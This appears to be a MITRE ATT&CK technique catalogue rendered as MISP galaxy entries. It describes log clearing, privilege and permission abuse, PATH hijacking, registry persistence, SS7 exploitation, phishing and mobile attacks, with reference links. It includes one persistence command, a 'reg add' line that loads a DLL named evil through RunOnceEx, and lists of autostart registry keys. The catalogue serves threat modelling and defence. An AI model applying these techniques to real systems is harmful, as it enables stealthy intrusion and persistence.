Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)

<code>/var/log/messages:</code>: General and system-related messages
<code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs
<code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records
<code>/var/log/kern.log</code>: Kernel logs
<code>/var/log/cron.log</code>: Crond logs
<code>/var/log/maillog</code>: Mail server logs
<code>/var/log/httpd/</code>: Web server access and error logs

The tag is: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002"

Table 3096. Table References
Links
https://attack.mitre.org/techniques/T1070/002
https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/

Add Office 365 Global Administrator Role - T1098.003

An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.

The tag is: misp-galaxy:mitre-attack-pattern="Add Office 365 Global Administrator Role - T1098.003"

Table 3097. Table References
Links
https://attack.mitre.org/techniques/T1098/003
https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

Compromise Software Dependencies and Development Tools - T1195.001

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001"

Table 3098. Table References
Links
https://attack.mitre.org/techniques/T1195/001
https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Windows File and Directory Permissions Modification - T1222.001

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

The tag is: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001"

Table 3099. Table References
Links
https://attack.mitre.org/techniques/T1222/001
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces
https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

Path Interception by PATH Environment Variable - T1574.007

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.

The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, <code>%SystemRoot%\system32</code> (e.g., <code>C:\Windows\system32</code>), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.

For example, if <code>C:\example path</code> precedes </code>C:\Windows\system32</code> is in the PATH environment variable, a program that is named net.exe and placed in <code>C:\example path</code> will be called instead of the Windows system "net" when "net" is executed from the command-line.

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007"

Table 3100. Table References
Links
https://attack.mitre.org/techniques/T1574/007
https://capec.mitre.org/data/definitions/13.html
https://capec.mitre.org/data/definitions/38.html

Path Interception by Search Order Hijacking - T1574.008

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008"

Table 3101. Table References
Links
https://attack.mitre.org/techniques/T1574/008
https://capec.mitre.org/data/definitions/159.html
http://msdn.microsoft.com/en-us/library/ms682425
https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
http://msdn.microsoft.com/en-us/library/ms687393
https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN

Registry Run Keys / Startup Folder - T1060

Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

The following run keys are created by default on Windows systems: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on.

By default, the multistring BootExecute value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

The tag is: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060"

View relationships graph

Registry Run Keys / Startup Folder - T1060 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 3102. Table References
Links
https://attack.mitre.org/techniques/T1060
https://capec.mitre.org/data/definitions/270.html
http://msdn.microsoft.com/en-us/library/aa376977
https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key
https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
https://technet.microsoft.com/en-us/sysinternals/bb963902

Exploit SS7 to Redirect Phone Calls/SMS - T1449

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker’s control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449"

Table 3103. Table References
Links
https://attack.mitre.org/techniques/T1449
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html
https://berlin.ccc.de/_{tobias/31c3-ss7-locate-track-manipulate.pdf[https://berlin.ccc.de/}tobias/31c3-ss7-locate-track-manipulate.pdf]
https://www.youtube.com/watch?v=q0n5ySqbfdI
http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf
https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf
https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf
https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/

Assess security posture of physical locations - T1302

Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)

The tag is: misp-galaxy:mitre-attack-pattern="Assess security posture of physical locations - T1302"

Table 3104. Table References
Links
https://attack.mitre.org/techniques/T1302

Determine domain and IP address space - T1250

Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine domain and IP address space - T1250"

Table 3105. Table References
Links
https://attack.mitre.org/techniques/T1250

Research visibility gap of security vendors - T1290

If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-attack-pattern="Research visibility gap of security vendors - T1290"

Table 3106. Table References
Links
https://attack.mitre.org/techniques/T1290
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Exploit SS7 to Track Device Location - T1450

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450"

Table 3107. Table References
Links
https://attack.mitre.org/techniques/T1450
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html
https://berlin.ccc.de/_{tobias/31c3-ss7-locate-track-manipulate.pdf[https://berlin.ccc.de/}tobias/31c3-ss7-locate-track-manipulate.pdf]
https://www.youtube.com/watch?v=q0n5ySqbfdI
http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf
https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf
https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

Access Sensitive Data in Device Logs - T1413

On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device’s system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

The tag is: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413"

Table 3108. Table References
Links
https://attack.mitre.org/techniques/T1413
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Stolen Developer Credentials or Signing Keys - T1441

An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer’s identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).

Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer’s identity.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Stolen Developer Credentials or Signing Keys - T1441"

View relationships graph

Stolen Developer Credentials or Signing Keys - T1441 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 3109. Table References
Links
https://attack.mitre.org/techniques/T1441

Component Object Model and Distributed COM - T1175

This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).

Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.

COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.

Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175"

Table 3110. Table References
Links
https://attack.mitre.org/techniques/T1175
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1
https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx
https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html
https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

Develop social network persona digital footprint - T1342

Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342"

Table 3111. Table References
Links
https://attack.mitre.org/techniques/T1342
https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

Assess vulnerability of 3rd party vendors - T1298

Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)

The tag is: misp-galaxy:mitre-attack-pattern="Assess vulnerability of 3rd party vendors - T1298"

Table 3112. Table References
Links
https://attack.mitre.org/techniques/T1298

Manipulate App Store Rankings or Ratings - T1452

An adversary could use access to a compromised device’s credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452"

Table 3113. Table References
Links
https://attack.mitre.org/techniques/T1452

Acquire OSINT data sets and information - T1247

Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247"

View relationships graph

Acquire OSINT data sets and information - T1247 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266" with estimative-language:likelihood-probability="almost-certain"

Table 3114. Table References
Links
https://attack.mitre.org/techniques/T1247

Acquire OSINT data sets and information - T1266

Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266"

View relationships graph

Acquire OSINT data sets and information - T1266 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247" with estimative-language:likelihood-probability="almost-certain"

Table 3115. Table References
Links
https://attack.mitre.org/techniques/T1266

Acquire OSINT data sets and information - T1277

Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277"

View relationships graph

Acquire OSINT data sets and information - T1277 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247" with estimative-language:likelihood-probability="almost-certain"

Table 3116. Table References
Links
https://attack.mitre.org/techniques/T1277

Assess opportunities created by business deals - T1299

During mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)

The tag is: misp-galaxy:mitre-attack-pattern="Assess opportunities created by business deals - T1299"

Table 3117. Table References
Links
https://attack.mitre.org/techniques/T1299

SSL certificate acquisition for trust breaking - T1338

Fake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)

The tag is: misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for trust breaking - T1338"

Table 3118. Table References
Links
https://attack.mitre.org/techniques/T1338

Identify resources required to build capabilities - T1348

As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Identify resources required to build capabilities - T1348"

Table 3119. Table References
Links
https://attack.mitre.org/techniques/T1348

Hardware or software supply chain implant - T1365

During production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)

The tag is: misp-galaxy:mitre-attack-pattern="Hardware or software supply chain implant - T1365"

Table 3120. Table References
Links
https://attack.mitre.org/techniques/T1365

Test malware in various execution environments - T1357

Malware may perform differently on different platforms (computer vs handheld) and different operating systems ([Ubuntu](http://www.ubuntu.com) vs [OS X](http://www.apple.com/osx)), and versions ([Windows](http://windows.microsoft.com) 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware in various execution environments - T1357"

Table 3121. Table References
Links
https://attack.mitre.org/techniques/T1357

Conduct social engineering or HUMINT operation - T1376

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering or HUMINT operation - T1376"

Table 3122. Table References
Links
https://attack.mitre.org/techniques/T1376

Spear phishing messages with malicious attachments - T1367

This technique has been deprecated. Please use [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).

Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious attachments - T1367"

Table 3123. Table References
Links
https://attack.mitre.org/techniques/T1367

Authorized user performs requested cyber action - T1386

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)

The tag is: misp-galaxy:mitre-attack-pattern="Authorized user performs requested cyber action - T1386"

Table 3124. Table References
Links
https://attack.mitre.org/techniques/T1386
https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Spear phishing messages with text only - T1368

This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.

Emails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with text only - T1368"

Table 3125. Table References
Links
https://attack.mitre.org/techniques/T1368

Spear phishing messages with malicious links - T1369

This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).

Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious links - T1369"

Table 3126. Table References
Links
https://attack.mitre.org/techniques/T1369

Unauthorized user introduces compromise delivery mechanism - T1387

This technique has been deprecated. Please use [Hardware Additions](https://attack.mitre.org/techniques/T1200) where appropriate.

If an adversary can gain physical access to the target’s environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)

The tag is: misp-galaxy:mitre-attack-pattern="Unauthorized user introduces compromise delivery mechanism - T1387"

Table 3127. Table References
Links
https://attack.mitre.org/techniques/T1387

Modify OS Kernel or Boot Partition - T1398

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device kernel or other boot partition components, where the code may evade detection, may persist after device resets, and may not be removable by the device user. In some cases (e.g., the Samsung Knox warranty bit as described under Detection), the attack may be detected but could result in the device being placed in a state that no longer allows certain functionality.

Many Android devices provide the ability to unlock the bootloader for development purposes, but doing so introduces the potential ability for others to maliciously update the kernel or other boot partition code.

If the bootloader is not unlocked, it may still be possible to exploit device vulnerabilities to update the code.

The tag is: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398"

Table 3128. Table References
Links
https://attack.mitre.org/techniques/T1398
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html
https://www2.samsungknox.com/en/faq/what-knox-warranty-bit-and-how-it-triggered
https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Exploit via Charging Station or PC - T1458

If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device’s battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection(Citation: Krebs-JuiceJacking).

Previous demonstrations have included:

Injecting malicious applications into iOS devices(Citation: Lau-Mactans).
Exploiting a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location(Citation: IBM-NexusUSB).
Exploiting Android devices such as the Google Pixel 2 over USB(Citation: GoogleProjectZero-OATmeal).

Products from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices(Citation: Computerworld-iPhoneCracking).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458"

Table 3129. Table References
Links
https://attack.mitre.org/techniques/T1458
https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html
http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/
https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf
https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/
https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html
https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html

Deliver Malicious App via Other Means - T1476

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.

Delivery methods for the malicious application include:

[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.
[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.
Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)

Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

The tag is: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476"

Table 3130. Table References
Links
https://attack.mitre.org/techniques/T1476
https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html
https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861
https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/
https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/
